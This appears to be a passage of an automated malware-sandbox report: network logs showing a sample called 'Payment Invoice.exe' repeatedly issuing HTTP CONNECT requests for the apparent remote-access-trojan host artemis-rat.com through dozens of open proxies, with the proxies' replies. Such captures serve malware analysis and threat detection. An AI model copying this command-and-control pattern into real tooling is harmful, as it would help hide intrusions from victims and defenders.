                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.748310089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1612192.168.2.454723112.5.33.1799997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.748497009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.013906002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1613192.168.2.454861139.59.1.1480807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.754877090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.349478960 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1614192.168.2.454927107.173.255.18312347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.756108046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1615192.168.2.454890182.106.220.25290917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.756108046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.098247051 CET325INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.1
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1616192.168.2.454173192.241.177.96105997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.757721901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823892117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.824323893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824170113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.823575974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1617192.168.2.454870188.132.222.3980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.760330915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.387466908 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1618192.168.2.45418691.142.222.84570417076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.781373978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.777008057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886740923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.980150938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.089318991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.089243889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.089354992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1619192.168.2.452862162.214.121.173643827076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.808420897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823962927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.824482918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824331045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.823654890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:57.823616982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1620192.168.2.454925138.36.150.2610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.809212923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1621192.168.2.454159163.172.169.27163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.809603930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823960066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.824321985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824151993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.012897015 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1622192.168.2.4528788.39.228.25395937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.810561895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1623192.168.2.452908207.244.229.3479767076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.821908951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.823942900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.824294090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824146032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.823654890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1624192.168.2.45492645.120.178.19710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.829833984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1625192.168.2.45504943.153.174.44437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.870239019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1626192.168.2.450248209.14.112.810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.875430107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.880156040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1627192.168.2.45392174.119.144.6041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.875607014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.026823044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1628192.168.2.45505043.153.174.44437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.876055956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1629192.168.2.454946192.154.246.9690007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.974520922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1630192.168.2.450119117.202.20.6910887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.974752903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1631192.168.2.450240212.231.197.2941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.979487896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1632192.168.2.454766117.160.250.16399997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.979489088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.725032091 CET221INHTTP/1.1 403 Access Denied
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Connection: close
                                                                Cache-Control: no-store
                                                                Content-Type: text/html
                                                                Content-Language: en
                                                                Content-Length: 43
                                                                Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                Data Ascii: You are not allowed to access the document.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1633192.168.2.45492847.243.205.131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.981961966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1634192.168.2.454942142.54.228.19341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.981962919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1635192.168.2.454986104.16.207.86807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.982131004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.139868975 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1636192.168.2.454995104.16.195.74807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.982131004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.139667988 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
